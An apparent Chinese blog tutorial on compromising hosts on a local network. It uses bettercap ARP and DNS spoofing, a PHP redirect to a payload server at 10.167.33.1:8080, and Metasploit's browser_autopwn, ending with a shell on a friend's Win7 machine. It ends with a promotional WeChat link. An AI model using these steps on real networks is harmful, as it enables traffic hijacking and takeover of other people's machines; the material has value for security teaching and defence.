我是如何統治內網的

日出東方,唯我不敗;千秋萬代,一統江湖!

教主文成武德、澤被蒼生 ,千秋萬載,一統江湖!

測試主機:kali 2016.2

工具:bettercap、metasploit、dnsspoof、armitage

前期準備工作

在kali下並沒有集成bettercap,所以我們需要自己安裝

安裝完成

啟動postgresql服務

metasploit資料庫初始化

查看資料庫鏈接狀態,如果這裡顯示資料庫未連接可以參考:傳送門 連接資料庫

啟動armitage(關於armitage)

準備一個hosts文件(用於DNS欺騙)

更改:剛才試了一下,在hosts文件中加上埠號好像會出現一些意料不到的問題。這裡我們換個思路,直接到ip地址不加埠號,然後開啟apache服務,然後將下面的代碼保存為index.php放在根目錄下(/var/www/html/)

<?php header("Location:http://10.167.33.1:8080"); ?>n

這樣在DNS欺騙後會跳到指定ip,然後在通過php重定向到我們的payload。

還有一種方法是在下邊啟動瀏覽器自動攻擊插件時,將埠號直接改成80埠。

/**************************************zhun bei wan cheng *****************************************/

啟動瀏覽器自動攻擊模塊:browser_autopwn

等待他將所有payload載入完成

arp攻擊(執行:bettercap -X)

DNS欺騙(忘了截圖 圖是後補的 所以參數有點不一樣)

現在我們就等魚上鉤,現在同一網關下的主機不管打開什麼URL都會解析到我們的URL中,當他打開我們的URL時,程序會自動驗證哪個pay可用

我們的DNS欺騙只對同一網關下的主機有效,但是我們共計用的URL只要能訪問到我們的地址就可以。下圖可以看到有兩台win10主機為arp+dns欺騙過來的,而安卓兩台win7是我將這個URL發給了我的朋友,當然他也是在內網中的。如果我們需要攻擊一台公網中的主機可以參考公網的Shell如何返回到內網的Kali 。最終有一台win7的瀏覽器成功運行了我們的payload並返回了shell。

查看文件

屏幕截圖

當然功能遠遠不止這些,更多好玩的可以自己探索。

水平有限,有錯誤請指出。

如果有一塊學習的同志私聊我上車。

上車的有點多,要超載了,關注公眾號吧,公眾號更新會比知乎的更全面

公眾號:sssie95zz

二維碼鏈接如下:

weixin.qq.com/r/EjoZAYj (二維碼自動識別)


推薦閱讀:

再一次獲取你的WIFI密碼(fluxion附視頻)

TAG:信息安全 | 内网安全 |